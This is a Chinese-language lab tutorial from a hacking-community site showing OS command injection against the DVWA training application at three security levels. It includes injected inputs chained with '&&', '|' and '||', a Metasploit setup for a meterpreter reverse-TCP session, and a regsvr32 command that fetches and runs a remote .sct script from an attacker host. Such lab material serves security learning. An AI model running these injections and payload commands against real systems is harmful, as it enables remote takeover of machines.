Metasploit实战命令注入教程:在DVWA中实战演练OS命令注入漏洞

zevseo
8100zevseo安全工作者
2018-09-03 04:59:28
8100 2018-09-03 04:59:28
命令注入是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用程序将不安全的用户提供的数据(表单,cookie,HTTP标头等)传递给系统shell时,可能会发生命令注入攻击。在此攻击中,攻击者提供的操作系统命令通常以易受攻击的应用程序的权限执行。命令注入攻击很可能主要是由于输入验证不足。
此攻击与代码注入不同,因为代码注入允许攻击者添加自己的代码,然后由应用程序执行。在代码注入中,攻击者扩展了应用程序的默认功能,而无需执行系统命令。
资源:https://www.owasp.org/index.php/Command_Injection
首先,在学习课程之前保证你已经安装了DVWA,点击学习DVWA安装教程
现在打开电脑中的DVWA并使用以下凭据登录:
用户名  - admin
密码  - password

选择低级别安全性
单击DVWA Security并将网站安全级别设置为
在命令注入中使用“&&”来绕过此服务器的低安全性。

描述:在DVWA中实战演练OS命令注入漏洞


转到命令执行页面输入IP地址,然后单击“提交”。

描述:在DVWA中实战演练OS命令注入漏洞


现在您可以看到回复告诉我们已与服务器建立连接。我已经尝试了很多次以确保这一点,因此,无论何时执行此命令,您都会看到以下内容:

描述:在DVWA中实战演练OS命令注入漏洞


我们也可以通过使用 sign 同时实现多个命令  。例如,下一个命令是:
192.168.1.100 && dir

在上面的命令单击提交后,  执行上述命令将逐项列出所有目录和文件。

描述:在DVWA中实战演练OS命令注入漏洞


我们找到了4个目录和一个文件以及该目录的路径。

描述:在DVWA中实战演练OS命令注入漏洞


下一个命令是192.168.1.100 && net user点击提交,此命令将显示用户的列表

描述:在DVWA中实战演练OS命令注入漏洞


描述:在DVWA中实战演练OS命令注入漏洞


提供各种命令,在提交时将给出预期的结果。首先,我们将找到一种方法将我的恶意负载转移到远程机器,为此我使用我最喜欢的工具metasploit。要使用metasploit,您需要在kali终端中键入msfconsole,然后键入以下命令
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
在DVWA中实战演练OS命令注入漏洞

描述:在DVWA中实战演练OS命令注入漏洞


我们可以使用以下命令打开远程主机上的端口,并使用metasploit连接回端口。

然后单击“ 提交”

描述:在DVWA中实战演练OS命令注入漏洞


现在您将获得受害者PC的计时器会话。并输入  sysinfo  以获取系统信息。
在DVWA中实战演练OS命令注入漏洞

描述:在DVWA中实战演练OS命令注入漏洞



绕过中级安全性
单击DVWA Security并设置Website Security Level Medium
在命令注入中使用管道“|”来绕过此服务器的介质安全性。

描述:在DVWA中实战演练OS命令注入漏洞


使用metasploit执行与上面相同的过程,并进一步输入:
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll

描述:在DVWA中实战演练OS命令注入漏洞


我们再一次得到了预备会话2

描述:在DVWA中实战演练OS命令注入漏洞



绕过高级别安全性
单击DVWA Security并将网站安全级别设置为
尝试使用管道“ || “在命令注入中绕过此服务器的高安全性

描述:在DVWA中实战演练OS命令注入漏洞


使用metasploit执行与上述相同的过程
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
然后单击“ 提交”

描述:在DVWA中实战演练OS命令注入漏洞


是的,我们有一个测试会话3!

描述:在DVWA中实战演练OS命令注入漏洞


最后我们完成了所有三级低,中,高DVWA。
本文标题:Metasploit实战命令注入教程:在DVWA中实战演练OS命令注入漏洞
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2232.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan